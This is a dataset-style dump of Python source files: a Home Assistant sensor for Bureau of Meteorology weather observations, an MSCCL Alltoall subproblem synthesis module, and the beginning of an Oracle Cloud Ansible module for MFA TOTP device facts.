if wmo != "..":
latlon[wmo] = (float(lat), float(lon))
zones = {}
pattern = (
r'<a href="/products/(?P<zone>ID[A-Z]\d\d\d\d\d)/'
r'(?P=zone)\.(?P<wmo>\d\d\d\d\d).shtml">'
)
for state in ("nsw", "vic", "qld", "wa", "tas", "nt"):
url = "http://www.bom.gov.au/{0}/observations/{0}all.shtml".format(state)
for zone_id, wmo_id in re.findall(pattern, requests.get(url).text):
zones[wmo_id] = zone_id
return {"{}.{}".format(zones[k], k): latlon[k] for k in set(latlon) & set(zones)}
def bom_stations(cache_dir):
"""Return {CONF_STATION: (lat, lon)} for all stations, for auto-config.
Results from internet requests are cached as compressed JSON, making
subsequent calls very much faster.
"""
cache_file = os.path.join(cache_dir, ".bom-stations.json.gz")
if not os.path.isfile(cache_file):
stations = _get_bom_stations()
with gzip.open(cache_file, "wt") as cache:
json.dump(stations, cache, sort_keys=True)
return stations
with gzip.open(cache_file, "rt") as cache:
return {k: tuple(v) for k, v in json.load(cache).items()}
def closest_station(lat, lon, cache_dir):
"""Return the ZONE_ID.WMO_ID of the closest station to our lat/lon."""
if lat is None or lon is None or not os.path.isdir(cache_dir):
return
stations = bom_stations(cache_dir)
def comparable_dist(wmo_id):
"""Create a psudeo-distance from latitude/longitude."""
station_lat, station_lon = stations[wmo_id]
return (lat - station_lat) ** 2 + (lon - station_lon) ** 2
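    # Squared lat/lon deltas are enough here: min() only needs a monotonic
    # ranking, not true distances, so this rough planar proxy (which ignores
    # the earth's curvature) is acceptable for picking the nearest station.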
return min(stations, key=comparable_dist)
| 33.880466
| 86
| 0.61234
|
import datetime
import ftplib
import gzip
import io
import json
import logging
import os
import re
import zipfile
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS,
CONF_NAME,
ATTR_ATTRIBUTION,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_RESOURCE = "http://www.bom.gov.au/fwo/{}/{}.{}.json"
_LOGGER = logging.getLogger(__name__)
ATTR_LAST_UPDATE = "last_update"
ATTR_SENSOR_ID = "sensor_id"
ATTR_STATION_ID = "station_id"
ATTR_STATION_NAME = "station_name"
ATTR_ZONE_ID = "zone_id"
ATTRIBUTION = "Data provided by the Australian Bureau of Meteorology"
CONF_STATION = "station"
CONF_ZONE_ID = "zone_id"
CONF_WMO_ID = "wmo_id"
MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(seconds=60)
SENSOR_TYPES = {
"wmo": ["wmo", None],
"name": ["Station Name", None],
"history_product": ["Zone", None],
"local_date_time": ["Local Time", None],
"local_date_time_full": ["Local Time Full", None],
"aifstime_utc": ["UTC Time Full", None],
"lat": ["Lat", None],
"lon": ["Long", None],
"apparent_t": ["Feels Like C", TEMP_CELSIUS],
"cloud": ["Cloud", None],
"cloud_base_m": ["Cloud Base", None],
"cloud_oktas": ["Cloud Oktas", None],
"cloud_type_id": ["Cloud Type ID", None],
"cloud_type": ["Cloud Type", None],
"delta_t": ["Delta Temp C", TEMP_CELSIUS],
"gust_kmh": ["Wind Gust kmh", "km/h"],
"gust_kt": ["Wind Gust kt", "kt"],
"air_temp": ["Air Temp C", TEMP_CELSIUS],
"dewpt": ["Dew Point C", TEMP_CELSIUS],
"press": ["Pressure mb", "mbar"],
"press_qnh": ["Pressure qnh", "qnh"],
"press_msl": ["Pressure msl", "msl"],
"press_tend": ["Pressure Tend", None],
"rain_trace": ["Rain Today", "mm"],
"rel_hum": ["Relative Humidity", "%"],
"sea_state": ["Sea State", None],
"swell_dir_worded": ["Swell Direction", None],
"swell_height": ["Swell Height", "m"],
"swell_period": ["Swell Period", None],
"vis_km": ["Visability km", "km"],
"weather": ["Weather", None],
"wind_dir": ["Wind Direction", None],
"wind_spd_kmh": ["Wind Speed kmh", "km/h"],
"wind_spd_kt": ["Wind Speed kt", "kt"],
}
def validate_station(station):
if station is None:
return
station = station.replace(".shtml", "")
if not re.fullmatch(r"ID[A-Z]\d\d\d\d\d\.\d\d\d\d\d", station):
raise vol.error.Invalid("Malformed station ID")
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Inclusive(CONF_ZONE_ID, "Deprecated partial station ID"): cv.string,
vol.Inclusive(CONF_WMO_ID, "Deprecated partial station ID"): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
station = config.get(CONF_STATION)
zone_id, wmo_id = config.get(CONF_ZONE_ID), config.get(CONF_WMO_ID)
if station is not None:
if zone_id and wmo_id:
_LOGGER.warning(
"Using config %s, not %s and %s for BOM sensor",
CONF_STATION,
CONF_ZONE_ID,
CONF_WMO_ID,
)
elif zone_id and wmo_id:
station = "{}.{}".format(zone_id, wmo_id)
else:
station = closest_station(
config.get(CONF_LATITUDE),
config.get(CONF_LONGITUDE),
hass.config.config_dir,
)
if station is None:
_LOGGER.error("Could not get BOM weather station from lat/lon")
return
bom_data = BOMCurrentData(station)
try:
bom_data.update()
except ValueError as err:
_LOGGER.error("Received error from BOM Current: %s", err)
return
add_entities(
[
BOMCurrentSensor(bom_data, variable, config.get(CONF_NAME))
for variable in config[CONF_MONITORED_CONDITIONS]
]
)
class BOMCurrentSensor(Entity):
def __init__(self, bom_data, condition, stationname):
self.bom_data = bom_data
self._condition = condition
self.stationname = stationname
@property
def name(self):
if self.stationname is None:
return "BOM {}".format(SENSOR_TYPES[self._condition][0])
return "BOM {} {}".format(self.stationname, SENSOR_TYPES[self._condition][0])
@property
def state(self):
return self.bom_data.get_reading(self._condition)
@property
def device_state_attributes(self):
attr = {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_LAST_UPDATE: self.bom_data.last_updated,
ATTR_SENSOR_ID: self._condition,
ATTR_STATION_ID: self.bom_data.latest_data["wmo"],
ATTR_STATION_NAME: self.bom_data.latest_data["name"],
ATTR_ZONE_ID: self.bom_data.latest_data["history_product"],
}
return attr
@property
def unit_of_measurement(self):
return SENSOR_TYPES[self._condition][1]
def update(self):
self.bom_data.update()
class BOMCurrentData:
def __init__(self, station_id):
self._zone_id, self._wmo_id = station_id.split(".")
self._data = None
self.last_updated = None
def _build_url(self):
url = _RESOURCE.format(self._zone_id, self._zone_id, self._wmo_id)
_LOGGER.debug("BOM URL: %s", url)
return url
@property
def latest_data(self):
if self._data:
return self._data[0]
return None
def get_reading(self, condition):
condition_readings = (entry[condition] for entry in self._data)
return next((x for x in condition_readings if x != "-"), None)
def should_update(self):
if self.last_updated is None:
return True
now = datetime.datetime.now()
update_due_at = self.last_updated + datetime.timedelta(minutes=35)
return now > update_due_at
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
if not self.should_update():
_LOGGER.debug(
"BOM was updated %s minutes ago, skipping update as"
" < 35 minutes, Now: %s, LastUpdate: %s",
(datetime.datetime.now() - self.last_updated),
datetime.datetime.now(),
self.last_updated,
)
return
try:
result = requests.get(self._build_url(), timeout=10).json()
self._data = result["observations"]["data"]
self.last_updated = datetime.datetime.strptime(
str(self._data[0]["local_date_time_full"]), "%Y%m%d%H%M%S"
)
return
except ValueError as err:
_LOGGER.error("Check BOM %s", err.args)
self._data = None
raise
def _get_bom_stations():
latlon = {}
with io.BytesIO() as file_obj:
with ftplib.FTP("ftp.bom.gov.au") as ftp:
ftp.login()
ftp.cwd("anon2/home/ncc/metadata/sitelists")
ftp.retrbinary("RETR stations.zip", file_obj.write)
file_obj.seek(0)
with zipfile.ZipFile(file_obj) as zipped:
with zipped.open("stations.txt") as station_txt:
for _ in range(4):
station_txt.readline()
while True:
line = station_txt.readline().decode().strip()
if len(line) < 120:
break
wmo, lat, lon = (
line[a:b].strip() for a, b in [(128, 134), (70, 78), (79, 88)]
)
if wmo != "..":
latlon[wmo] = (float(lat), float(lon))
zones = {}
pattern = (
r'<a href="/products/(?P<zone>ID[A-Z]\d\d\d\d\d)/'
r'(?P=zone)\.(?P<wmo>\d\d\d\d\d).shtml">'
)
for state in ("nsw", "vic", "qld", "wa", "tas", "nt"):
url = "http://www.bom.gov.au/{0}/observations/{0}all.shtml".format(state)
for zone_id, wmo_id in re.findall(pattern, requests.get(url).text):
zones[wmo_id] = zone_id
return {"{}.{}".format(zones[k], k): latlon[k] for k in set(latlon) & set(zones)}
def bom_stations(cache_dir):
cache_file = os.path.join(cache_dir, ".bom-stations.json.gz")
if not os.path.isfile(cache_file):
stations = _get_bom_stations()
with gzip.open(cache_file, "wt") as cache:
json.dump(stations, cache, sort_keys=True)
return stations
with gzip.open(cache_file, "rt") as cache:
return {k: tuple(v) for k, v in json.load(cache).items()}
def closest_station(lat, lon, cache_dir):
if lat is None or lon is None or not os.path.isdir(cache_dir):
return
stations = bom_stations(cache_dir)
def comparable_dist(wmo_id):
station_lat, station_lon = stations[wmo_id]
return (lat - station_lat) ** 2 + (lon - station_lon) ** 2
return min(stations, key=comparable_dist)
| true
| true
|
790b2e75e195f6e48d17b20887b50e09e339d377
| 10,140
|
py
|
Python
|
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | 1
|
2022-03-03T02:33:15.000Z
|
2022-03-03T02:33:15.000Z
|
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | null | null | null |
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from msccl.collectives import *
from msccl.algorithm import *
from msccl.instance import *
from msccl.topologies import *
def _alltoall_subproblem(local_nodes, num_copies):
remote_node = local_nodes
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
    def cases(chunk, local, remote_out, remote_in):
if chunk < local_end:
return local(chunk)
elif chunk < remote_out_end:
return remote_out(chunk - local_end)
else:
return remote_in(chunk - remote_out_end)
def pre(rank, chunk):
return cases(chunk,
lambda c: rank == c % local_nodes,
lambda c: rank == (c // (num_copies - 1)) % local_nodes,
lambda c: rank == remote_node)
def post(rank, chunk):
return cases(chunk,
lambda c: rank == c // local_nodes,
lambda c: rank == remote_node,
lambda c: rank == (c // (num_copies - 1)) // local_nodes)
def trigger(rank, chunk):
if rank == remote_node:
return cases(chunk,
lambda c: None,
lambda c: chunk + num_remote_pairs,
lambda c: chunk - num_remote_pairs)
else:
return None
return build_collective(f'AlltoallSubproblem(n={local_nodes},copies={num_copies})',
local_nodes + 1, num_chunks,
pre, post, trigger=trigger)
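# Illustrative sizing (hypothetical values, not from any particular run): with
# local_nodes=2 and num_copies=2, local_end=4, num_remote_pairs=4,
# remote_out_end=8 and num_chunks=12, i.e. chunks 0-3 stay local, 4-7 are
# outbound remote pairs and 8-11 are the matching inbound remote pairs.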
def make_alltoall_subproblem_collective_and_topology(topology, num_copies, relay_nodes, bw = 1, share_bw = False):
local_nodes = topology.num_nodes()
remote_node = local_nodes
links = [[0 for _ in range(local_nodes + 1)] for _ in range(local_nodes + 1)]
for src in range(local_nodes):
for dst in range(local_nodes):
links[dst][src] = topology.link(src, dst)
for relay in relay_nodes:
links[remote_node][relay] = bw
links[relay][remote_node] = bw
switches = topology.switches.copy()
if share_bw:
        switches.append((relay_nodes, [remote_node], bw, 'remote_out'))
        switches.append(([remote_node], relay_nodes, bw, 'remote_in'))
collective = _alltoall_subproblem(local_nodes, num_copies)
    topology = Topology(f'Subtopo(local={topology.name},relays=({",".join(str(i) for i in relay_nodes)}))', links, switches)
return collective, topology
def synthesize_alltoall_subproblem(subproblem_algo, num_copies, logging=False):
if subproblem_algo.is_pipelined():
raise ValueError('Pipelining is not supported.')
local_topology = subproblem_algo.topology
chunks = subproblem_algo.instance.chunks
local_nodes = local_topology.num_nodes() - 1
remote_node = local_nodes
nodes = local_nodes * num_copies
collective = alltoall(nodes).chunk_up(chunks)
# Create a distributed topology where copies of relay nodes that connect to the remote node in the subproblem
# topology are connected to all the relay nodes in the other copies.
links = [[0 for _ in range(nodes)] for _ in range(nodes)]
for dst in range(nodes):
for src in range(nodes):
local_src = src % local_nodes
local_dst = dst % local_nodes
if src // local_nodes != dst // local_nodes:
bw = min(local_topology.link(local_src, remote_node), local_topology.link(remote_node, local_dst))
links[dst][src] = bw
else:
links[dst][src] = local_topology.link(local_src, local_dst)
# Also make copies of switches with a similar expansion of the remote node into the nodes of other copies.
switches = []
for srcs, dsts, bw, name in local_topology.switches:
for i in range(num_copies):
def to_dist(ranks):
for rank in ranks:
if rank < remote_node:
# Non-remote nodes are just translated to the distributed numbering of ranks.
yield rank + i * local_nodes
else:
# Include all remote nodes in the switch. This is fine because the links already limit
# connectivity to just the relay nodes.
for r in range(nodes):
if r // local_nodes != i:
yield r
dist_srcs = list(to_dist(srcs))
dist_dsts = list(to_dist(dsts))
switches.append((dist_srcs, dist_dsts, bw, f'copy_{i}_{name}_local'))
    topology = Topology(f'Stitched(sub={local_topology.name},copies={num_copies})', links, switches)
def nth_chunk_for_pair(src, dst, idx):
# The following chunk calculation respects both the _scattered and _transpose
# pre/postconditions in Alltoall. When substituting it in:
# -the precondition (chunk % self.num_nodes) simplifies to src
# -the postcondition ((chunk // self.num_nodes) % self.num_nodes) simplifies to dst
return (src + dst * collective.num_nodes) * chunks + idx
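    # Worked example under assumed values (collective.num_nodes=4, chunks=2):
    # the first of the two chunks travelling from rank 1 to rank 2 gets index
    # (1 + 2 * 4) * 2 + 0 = 18.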
steps = []
# Calculate the ranges of the differently handled chunks
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
for local_step in subproblem_algo.steps:
sends = []
# These are used to track operations involving remote nodes that get matched with another operation in the same
# step.
unmatched_sends = {}
unmatched_recvs = {}
# Stitch together copies of the subproblem algorithm
for chunk, src, dst in local_step.sends:
for i in range(num_copies):
def to_dist(rank):
# Translates ranks from the local to the distributed topology
return rank + i * local_nodes
def other_start(c):
# Given a relative remote chunk return local rank 0 in the copy it corresponds to
other_i = c % (num_copies - 1)
if other_i >= i:
other_i += 1
return other_i * local_nodes
# Calculate origin and target ranks that match the Alltoall pre/postconditions
if chunk < local_end:
assert src != remote_node and dst != remote_node
origin = to_dist((chunk // chunks) % local_nodes)
target = to_dist((chunk // chunks) // local_nodes)
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk)
elif chunk < remote_out_end:
c = chunk - local_end
local_origin = ((c // chunks) // (num_copies - 1)) % local_nodes
origin = to_dist(local_origin)
target = other_start(c) + ((c // (num_copies - 1))) // local_nodes
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(local_origin, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk + num_remote_pairs)
else:
assert chunk < num_chunks
c = chunk - remote_out_end
local_target = ((c // chunks) // (num_copies - 1)) // local_nodes
target = to_dist(local_target)
origin = other_start(c) + ((c // (num_copies - 1))) % local_nodes
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk - num_remote_pairs)
assert subproblem_algo.collective.postcondition(local_target, chunk)
# Get the chunk number in the distributed algorithm
chunk_idx = chunk % chunks
# Translate send src and dst to distributed space and add the send to the distributed algorithm
dist_chunk = nth_chunk_for_pair(origin, target, chunk_idx)
if dst == remote_node:
assert chunk < remote_out_end
# Sends to remote nodes have to find a matched receive
if dist_chunk in unmatched_recvs:
dist_dst = unmatched_recvs.pop(dist_chunk)
sends.append((dist_chunk, to_dist(src), dist_dst))
else:
unmatched_sends[dist_chunk] = to_dist(src)
elif src == remote_node:
assert chunk < num_chunks
# Receives from remote nodes have to find a matched send
if dist_chunk in unmatched_sends:
dist_src = unmatched_sends.pop(dist_chunk)
sends.append((dist_chunk, dist_src, to_dist(dst)))
else:
unmatched_recvs[dist_chunk] = to_dist(dst)
else:
# Sends locally are just translated to the new distributed space of ranks
sends.append((dist_chunk, to_dist(src), to_dist(dst)))
if len(unmatched_sends) > 0 or len(unmatched_recvs) > 0:
raise ValueError('Subproblem algorithm has unpaired sends/recvs.')
steps.append(Step(local_step.rounds, sends))
instance = Instance(
steps=len(steps),
extra_rounds=sum(step.rounds - 1 for step in steps),
chunks=chunks,
)
return Algorithm.make_implementation(collective, topology, instance, steps)
| 45.267857
| 133
| 0.60355
|
from msccl.collectives import *
from msccl.algorithm import *
from msccl.instance import *
from msccl.topologies import *
def _alltoall_subproblem(local_nodes, num_copies):
remote_node = local_nodes
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
    def cases(chunk, local, remote_out, remote_in):
if chunk < local_end:
return local(chunk)
elif chunk < remote_out_end:
return remote_out(chunk - local_end)
else:
return remote_in(chunk - remote_out_end)
def pre(rank, chunk):
return cases(chunk,
lambda c: rank == c % local_nodes,
lambda c: rank == (c // (num_copies - 1)) % local_nodes,
lambda c: rank == remote_node)
def post(rank, chunk):
return cases(chunk,
lambda c: rank == c // local_nodes,
lambda c: rank == remote_node,
lambda c: rank == (c // (num_copies - 1)) // local_nodes)
def trigger(rank, chunk):
if rank == remote_node:
return cases(chunk,
lambda c: None,
lambda c: chunk + num_remote_pairs,
lambda c: chunk - num_remote_pairs)
else:
return None
return build_collective(f'AlltoallSubproblem(n={local_nodes},copies={num_copies})',
local_nodes + 1, num_chunks,
pre, post, trigger=trigger)
def make_alltoall_subproblem_collective_and_topology(topology, num_copies, relay_nodes, bw = 1, share_bw = False):
local_nodes = topology.num_nodes()
remote_node = local_nodes
links = [[0 for _ in range(local_nodes + 1)] for _ in range(local_nodes + 1)]
for src in range(local_nodes):
for dst in range(local_nodes):
links[dst][src] = topology.link(src, dst)
for relay in relay_nodes:
links[remote_node][relay] = bw
links[relay][remote_node] = bw
switches = topology.switches.copy()
if share_bw:
        switches.append((relay_nodes, [remote_node], bw, 'remote_out'))
        switches.append(([remote_node], relay_nodes, bw, 'remote_in'))
collective = _alltoall_subproblem(local_nodes, num_copies)
    topology = Topology(f'Subtopo(local={topology.name},relays=({",".join(str(i) for i in relay_nodes)}))', links, switches)
return collective, topology
def synthesize_alltoall_subproblem(subproblem_algo, num_copies, logging=False):
if subproblem_algo.is_pipelined():
raise ValueError('Pipelining is not supported.')
local_topology = subproblem_algo.topology
chunks = subproblem_algo.instance.chunks
local_nodes = local_topology.num_nodes() - 1
remote_node = local_nodes
nodes = local_nodes * num_copies
collective = alltoall(nodes).chunk_up(chunks)
links = [[0 for _ in range(nodes)] for _ in range(nodes)]
for dst in range(nodes):
for src in range(nodes):
local_src = src % local_nodes
local_dst = dst % local_nodes
if src // local_nodes != dst // local_nodes:
bw = min(local_topology.link(local_src, remote_node), local_topology.link(remote_node, local_dst))
links[dst][src] = bw
else:
links[dst][src] = local_topology.link(local_src, local_dst)
switches = []
for srcs, dsts, bw, name in local_topology.switches:
for i in range(num_copies):
def to_dist(ranks):
for rank in ranks:
if rank < remote_node:
yield rank + i * local_nodes
else:
for r in range(nodes):
if r // local_nodes != i:
yield r
dist_srcs = list(to_dist(srcs))
dist_dsts = list(to_dist(dsts))
switches.append((dist_srcs, dist_dsts, bw, f'copy_{i}_{name}_local'))
    topology = Topology(f'Stitched(sub={local_topology.name},copies={num_copies})', links, switches)
def nth_chunk_for_pair(src, dst, idx):
return (src + dst * collective.num_nodes) * chunks + idx
steps = []
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
for local_step in subproblem_algo.steps:
sends = []
unmatched_sends = {}
unmatched_recvs = {}
for chunk, src, dst in local_step.sends:
for i in range(num_copies):
def to_dist(rank):
return rank + i * local_nodes
def other_start(c):
other_i = c % (num_copies - 1)
if other_i >= i:
other_i += 1
return other_i * local_nodes
if chunk < local_end:
assert src != remote_node and dst != remote_node
origin = to_dist((chunk // chunks) % local_nodes)
target = to_dist((chunk // chunks) // local_nodes)
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk)
elif chunk < remote_out_end:
c = chunk - local_end
local_origin = ((c // chunks) // (num_copies - 1)) % local_nodes
origin = to_dist(local_origin)
target = other_start(c) + ((c // (num_copies - 1))) // local_nodes
assert subproblem_algo.collective.precondition(local_origin, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk + num_remote_pairs)
else:
assert chunk < num_chunks
c = chunk - remote_out_end
local_target = ((c // chunks) // (num_copies - 1)) // local_nodes
target = to_dist(local_target)
origin = other_start(c) + ((c // (num_copies - 1))) % local_nodes
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk - num_remote_pairs)
assert subproblem_algo.collective.postcondition(local_target, chunk)
chunk_idx = chunk % chunks
dist_chunk = nth_chunk_for_pair(origin, target, chunk_idx)
if dst == remote_node:
assert chunk < remote_out_end
if dist_chunk in unmatched_recvs:
dist_dst = unmatched_recvs.pop(dist_chunk)
sends.append((dist_chunk, to_dist(src), dist_dst))
else:
unmatched_sends[dist_chunk] = to_dist(src)
elif src == remote_node:
assert chunk < num_chunks
if dist_chunk in unmatched_sends:
dist_src = unmatched_sends.pop(dist_chunk)
sends.append((dist_chunk, dist_src, to_dist(dst)))
else:
unmatched_recvs[dist_chunk] = to_dist(dst)
else:
sends.append((dist_chunk, to_dist(src), to_dist(dst)))
if len(unmatched_sends) > 0 or len(unmatched_recvs) > 0:
raise ValueError('Subproblem algorithm has unpaired sends/recvs.')
steps.append(Step(local_step.rounds, sends))
instance = Instance(
steps=len(steps),
extra_rounds=sum(step.rounds - 1 for step in steps),
chunks=chunks,
)
return Algorithm.make_implementation(collective, topology, instance, steps)
| true
| true
|
790b3063b426f898769b92541a7cd32a79c0cecb
| 8,111
|
py
|
Python
|
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2017, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_mfa_totp_device_facts
short_description: Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
- Lists the MFA TOTP devices for the specified user. The returned object contains the device's OCID, but not
the seed. The seed is returned only upon creation or when the IAM service regenerates the MFA seed for the device.
- If I(mfa_totp_device_id) is specified, the details of a single MfaTotpDevice will be returned.
version_added: "2.9"
author: Oracle (@oracle)
options:
user_id:
description:
- The OCID of the user.
type: str
required: true
mfa_totp_device_id:
description:
- The OCID of the MFA TOTP device.
- Required to get a specific mfa_totp_device.
type: str
aliases: ["id"]
sort_by:
description:
- The field to sort by. You can provide one sort order (`sortOrder`). Default order for
TIMECREATED is descending. Default order for NAME is ascending. The NAME
sort order is case sensitive.
- "**Note:** In general, some \\"List\\" operations (for example, `ListInstances`) let you
optionally filter by Availability Domain if the scope of the resource type is within a
single Availability Domain. If you call one of these \\"List\\" operations without specifying
an Availability Domain, the resources are grouped by Availability Domain, then sorted."
type: str
choices:
- "TIMECREATED"
- "NAME"
sort_order:
description:
- The sort order to use, either ascending (`ASC`) or descending (`DESC`). The NAME sort order
is case sensitive.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List mfa_totp_devices
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific mfa_totp_device
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
mfa_totp_device_id: ocid1.mfatotpdevice.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
mfa_totp_devices:
description:
- List of MfaTotpDevice resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the MFA TOTP Device.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
user_id:
description:
- The OCID of the user the MFA TOTP device belongs to.
returned: on success
type: string
sample: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
time_created:
description:
- Date and time the `MfaTotpDevice` object was created, in the format defined by RFC3339.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_expires:
description:
- Date and time when this MFA TOTP device will expire, in the format defined by RFC3339.
Null if it never expires.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
lifecycle_state:
description:
- The MFA TOTP device's current state.
returned: on success
type: string
sample: CREATING
inactive_status:
description:
- "The detailed status of INACTIVE lifecycleState.
Allowed values are:
- 1 - SUSPENDED
- 2 - DISABLED
- 4 - BLOCKED
- 8 - LOCKED"
returned: on success
type: int
sample: 56
is_activated:
description:
- Flag to indicate if the MFA TOTP device has been activated
returned: on success
type: bool
sample: true
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"user_id": "ocid1.user.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2016-08-25T21:10:29.600Z",
"time_expires": "2016-08-25T21:10:29.600Z",
"lifecycle_state": "CREATING",
"inactive_status": 56,
"is_activated": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class MfaTotpDeviceFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"user_id",
"mfa_totp_device_id",
]
def get_required_params_for_list(self):
return [
"user_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_mfa_totp_device,
user_id=self.module.params.get("user_id"),
mfa_totp_device_id=self.module.params.get("mfa_totp_device_id"),
)
def list_resources(self):
optional_list_method_params = [
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
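        # For instance (illustrative parameters): with sort_by="NAME" supplied
        # and sort_order left unset, optional_kwargs is {"sort_by": "NAME"},
        # so only that filter is forwarded to list_mfa_totp_devices below.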
return oci_common_utils.list_all_resources(
self.client.list_mfa_totp_devices,
user_id=self.module.params.get("user_id"),
**optional_kwargs
)
MfaTotpDeviceFactsHelperCustom = get_custom_class("MfaTotpDeviceFactsHelperCustom")
class ResourceFactsHelper(MfaTotpDeviceFactsHelperCustom, MfaTotpDeviceFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
user_id=dict(type="str", required=True),
mfa_totp_device_id=dict(aliases=["id"], type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="mfa_totp_device",
service_client_class=IdentityClient,
namespace="identity",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(mfa_totp_devices=result)
if __name__ == "__main__":
main()
| 33.241803
| 120
| 0.631365
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_mfa_totp_device_facts
short_description: Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
- Lists the MFA TOTP devices for the specified user. The returned object contains the device's OCID, but not
the seed. The seed is returned only upon creation or when the IAM service regenerates the MFA seed for the device.
- If I(mfa_totp_device_id) is specified, the details of a single MfaTotpDevice will be returned.
